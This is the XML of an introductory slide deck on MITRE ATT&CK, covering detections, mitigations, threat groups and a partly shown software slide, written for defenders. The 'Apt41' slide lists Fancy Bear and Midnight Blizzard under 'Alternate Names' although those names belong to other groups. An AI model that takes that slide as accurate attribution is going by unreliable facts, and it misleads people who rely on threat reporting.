            <a:softEdge rad="0"/>
          </a:effectLst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BFDEEBD9-5FD9-FF50-BD2A-706479DCFD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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Detections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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CEB2086-D6C1-10DD-0326-E5B04FD60123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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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AC6B85E-3844-64B3-E5FE-9485758646B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="36994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l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Inter"/>
              </a:rPr>
              <a:t>What Are Detections?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They turn raw data (telemetry) into actionable alerts.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They help you recognize when suspicious activity is happening.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Purpose in MITRE ATT&amp;CK:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Connects tactics, techniques, and sub-techniques to real-time alerts.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Guides you on how to set up rules in your security systems (like SIEM) to detect attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781444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7D1DBA6-A02A-92ED-08BC-DC999FD2D5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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F364EB-0DF2-8FF5-D7E4-656DDD04435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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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CB801F4A-42F3-72FE-A525-4FF0163D77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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Detections - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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8E11B7D-8EFC-7628-C239-DFEA48796FF8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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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F2E5B01-9069-9A3A-9A64-DC042B4C6775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838197" y="1363134"/>
            <a:ext cx="11353801" cy="49305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l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Inter"/>
              </a:rPr>
              <a:t>For Reconnaissance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Tactic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Active Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Sub Technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Detection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>An alert rule in your SIEM that flags unusual scan patterns in network traffic (e.g., from logs of your web application firewall or on-premises network).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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Inter"/>
              </a:rPr>
              <a:t>Detections convert raw telemetry into smart alerts, helping you quickly spot and respond to attacks while cutting through the noise.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527693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C49288-F605-047C-2ED4-0FE69DE2C2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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36ABF84-8441-57D6-E6D3-D9B836356ED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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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06730BC8-5B8E-7503-D3E0-EBC5FDB8AE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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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7315170-EE86-26FF-4AE6-D47D8668D87E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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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2F684A9-63E3-5DED-4E68-6827B53779AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="36994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l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Inter"/>
              </a:rPr>
              <a:t>What Are Mitigations?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They are the preventative steps you take to stop attacks from occurring.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Focus on changing settings and tightening defenses instead of only catching attacks later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Purpose in MITRE ATT&amp;CK:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reduce the attack surface by modifying configurations.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Help prevent the adversary's tactics, techniques, and sub-techniques from working.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1097423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C320BA-E804-CFFF-0A9F-9407C1DC97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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD346E43-2D06-BE4E-8BA6-6F424BB8951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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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9F09B9AA-F130-3F62-A999-631047D10A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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Mitigations – Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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548BB040-BA09-1C62-1B70-DE4BDFACF5C6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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10152845" y="5929648"/>
            <a:ext cx="1761829" cy="72813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E9A1BB9-2ADA-98BF-67B5-54D639A8CDAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="49305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l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Inter"/>
              </a:rPr>
              <a:t>Reconnaissance &amp; Vulnerability Scanning:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Hard to stop scans from outside your network (labeled as “pre-compromise”).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Focus on reducing sensitive data exposure and strengthen web application firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Privilege Escalation via Scheduled Tasks:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Use strong privileged account management in Active Directory.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Secure, manage, and monitor high-privilege accounts to block unauthorized access.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>It’s best to prevent attacks before they happen rather than just detecting them later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2147384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796748-EFEC-49EE-6778-C133A69766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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A86E4433-A4D6-FF23-FB80-0CADD73AD1E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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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30DE407A-4141-A183-0212-AD6DA902B5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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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0E091E2-6DBB-2304-A6DE-1D3794B3A6ED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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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F044104-90E6-2585-54D6-79D28A6A9E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="43150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l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Inter"/>
              </a:rPr>
              <a:t>What Are Groups?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Sets of attackers with similar behaviors and goals.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They help us identify and track adversary activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Multiple Names Across Vendors:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Different vendors use their own naming conventions.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>The same group might be called by different names by Mandiant, CrowdStrike, and Microsoft.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1702083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F1EBE9-0F4E-C937-4207-19060EAE67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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEC7C25-7A8A-4920-62DB-BAE6CAA564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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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84AA32B6-8CCC-FE1A-7C40-EB3B4A3C78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8" y="183253"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Groups - Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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EF60C2B-345E-A82C-02D3-FEC268A5098B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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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DF0D18F-D9AE-A147-8914-B63693335B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1212481"/>
            <a:ext cx="11277602" cy="49305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l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Inter"/>
              </a:rPr>
              <a:t>Apt41:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Widely reported for high-profile attacks (called Apt41 by Mandiant).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Alternate Names:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>CrowdStrike may use animal names (e.g., Fancy Bear) to hint at origin.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Microsoft might mix origin with weather terms (e.g., Midnight Blizzard).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Key Takeaway</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>When reviewing threat reports, remember that different names may refer to the same attacker group.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Major vendors' intelligence can help you connect the dots.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2775070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30716E-B93E-44A6-A472-0290459B76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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D9528B-3F21-3576-89E3-801F976604F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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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D11DBE3F-B969-EDE2-2E11-749225BF88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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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C28443A-706B-D8DA-2A05-ECDB66119362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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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03D2C4F-1B20-8D96-B5C3-E658E171F09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="49305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l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Inter"/>
              </a:rPr>
              <a:t>What is Software Here?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Refers to the tools and malware used by attackers.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
